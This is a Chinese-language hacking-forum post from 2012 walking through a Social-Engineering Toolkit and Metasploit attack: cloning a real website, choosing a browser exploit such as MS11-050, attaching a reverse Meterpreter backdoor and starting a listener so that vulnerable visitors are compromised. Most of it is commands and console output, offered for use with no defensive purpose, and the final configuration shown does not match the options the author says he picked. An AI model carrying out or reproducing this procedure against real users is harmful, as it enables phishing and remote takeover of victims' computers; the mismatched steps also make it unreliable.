切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
22 SET: 配合METASPLOIT的攻击[复制链接]
发表于 2012-8-6 17:07:20 | 显示全部楼层 |!read_mode!

参考我做的视频:翻墙先

1.:http://www.youtube.com/watch?v=kTSHe3xDvh8&feature=plcp

2.:http://www.youtube.com/watch?v=GrlWDWQP9pY&feature=plcp


首先停止APACHE2运行

  1. root@Dis9Team:/pen/set# /etc/init.d/apache2 stop
  2. * Stopping web server apache2                                                   ... waiting                                                             [ OK ]
  3. root@Dis9Team:/pen/set#
复制代码
启动SET:

  1. root@Dis9Team:/pen/set# ./set
复制代码
选择:
1) Social-Engineering Attacks
然后选择 WEB攻击
2) Website Attack Vectors
选择配置METASPLOIT:
2) Metasploit Browser Exploit Method3个选项:
  1. 1) Web Templates
  2.    2) Site Cloner
  3.    3) Custom Import
复制代码
1:WEB模板 2.在线生成一个站点 3.导入你的站点选择 2) Site Cloner
  1. set:webattack>2
  2. [-] SET supports both HTTP and HTTPS
  3. [-] Example: http://www.thisisafakesite.com
  4. set:webattack> Enter the url to clone:
复制代码
输入地址: 我输入http://www.baidu.com
回车以后 出来N多浏览器漏洞:
  1. set:webattack> Enter the url to clone:http://www.baidu.com

  2. Enter the browser exploit you would like to use

  3.    1) Java AtomicReferenceArray Type Violation Vulnerability
  4.    2) Adobe Flash Player MP4 "cprt" Overflow
  5.    3) MS12-004 midiOutPlayNextPolyEvent Heap Overflow
  6.    4) Java Applet Rhino Script Engine Remote Code Execution
  7.    5) MS11-050 IE mshtml!CObjectElement Use After Free
  8.    6) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
  9.    7) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
  10.    8) Internet Explorer CSS Import Use After Free (default)
  11.    9) Microsoft WMI Administration Tools ActiveX Buffer Overflow
  12.   10) Internet Explorer CSS Tags Memory Corruption
  13.   11) Sun Java Applet2ClassLoader Remote Code Execution
  14.   12) Sun Java Runtime New Plugin docbase Buffer Overflow
  15.   13) Microsoft Windows WebDAV Application DLL Hijacker
  16.   14) Adobe Flash Player AVM Bytecode Verification Vulnerability
  17.   15) Adobe Shockwave rcsL Memory Corruption Exploit
  18.   16) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
  19.   17) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution
  20.   18) Microsoft Help Center XSS and Command Execution (MS10-042)
  21.   19) Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
  22.   20) Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
  23.   21) Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
  24.   22) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
  25.   23) Microsoft Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
  26.   24) Microsoft Internet Explorer isComponentInstalled Overflow
  27.   25) Microsoft Internet Explorer Explorer Data Binding Corruption (MS08-078)
  28.   26) Microsoft Internet Explorer Unsafe Scripting Misconfiguration
  29.   27) FireFox 3.5 escape Return Value Memory Corruption
  30.   28) FireFox 3.6.16 mChannel use after free vulnerability
  31.   29) Metasploit Browser Autopwn (USE AT OWN RISK!)

  32. set:payloads>
复制代码
选择” 5) MS11-050 IE mshtml!CObjectElement Use After Free”
输入5回车后选择后门
  1. 1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
  2.    2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
  3.    3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
  4.    4) Windows Bind Shell                      Execute payload and create an accepting port on remote system.
  5.    5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
  6.    6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
  7.    7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
  8.    8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
  9.    9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10.   10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and use Reverse Meterpreter
  11.   11) Download/Run your Own Executable        Downloads an executable and runs it
复制代码
随便选择一个 选择 2) Windows Reverse_TCP Meterpreter
回车后输入监听端口:
set:payloads>5
set:payloads> Port to use for the reverse [443]:5987

载入MSFCONSOLE 生成后门:

  1. [*] Moving payload into cloned website.
  2. [*] The site has been moved. SET Web Server is now listening..
  3. [-] Launching MSF Listener...
  4. [-] This may take a few to load MSF...
  5. [-] ***
  6. [-] * WARNING: Database support has been disabled
  7. [-] ***

  8. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  9. MMMMMMMMMMM                MMMMMMMMMM
  10. MMMN$                           vMMMM
  11. MMMNl  MMMMM             MMMMM  JMMMM
  12. MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
  13. MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
  14. MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
  15. MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
  16. MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
  17. MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
  18. MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
  19. MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
  20. MMMMR  ?MMNM             MMMMM .dMMMM
  21. MMMMNm `?MMM             MMMM` dMMMMM
  22. MMMMMMN  ?MM             MM?  NMMMMMN
  23. MMMMMMMMNe                 JMMMMMNMMM
  24. MMMMMMMMMMNm,            eMMMMMNMMNMM
  25. MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
  26. MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM

  27.        =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
  28. + -- --=[ 846 exploits - 475 auxiliary - 142 post
  29. + -- --=[ 250 payloads - 27 encoders - 8 nops
  30.        =[ svn r15274 updated yesterday (2012.05.15)

  31. [*] Processing /pen/set/src/program_junk/meta_config for ERB directives.
  32. resource (/pen/set/src/program_junk/meta_config)> use windows/browser/cisco_anyconnect_exec
  33. resource (/pen/set/src/program_junk/meta_config)> set PAYLOAD windows/x64/shell_bind_tcp
  34. PAYLOAD => windows/x64/shell_bind_tcp
  35. resource (/pen/set/src/program_junk/meta_config)> set LHOST 1.1.1.128
  36. LHOST => 1.1.1.128
  37. resource (/pen/set/src/program_junk/meta_config)> set LPORT 5987
  38. LPORT => 5987
  39. resource (/pen/set/src/program_junk/meta_config)> set URIPATH /
  40. URIPATH => /
  41. resource (/pen/set/src/program_junk/meta_config)> set SRVPORT 8080
  42. SRVPORT => 8080
  43. resource (/pen/set/src/program_junk/meta_config)> set ExitOnSession false
  44. ExitOnSession => false
  45. resource (/pen/set/src/program_junk/meta_config)> exploit -j
  46. [*] Exploit running as background job.
  47. msf  exploit(cisco_anyconnect_exec) >
  48. [*] Using URL: http://0.0.0.0:8080/
  49. [*] Started bind handler
  50. [*]  Local IP: http://1.1.1.128:8080/
  51. [*] Server started.
复制代码

然后你懂的:
  • Local IP: http://1.1.1.128:8080/
    存在漏洞的机子访问后..



  • 附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
    操千曲而后晓声,观千剑而后识器。

    代码区

    GMT+8, 2020-9-23 14:49

    Powered by Discuz! X2

    © 2001-2018 Comsenz Inc.

    回顶部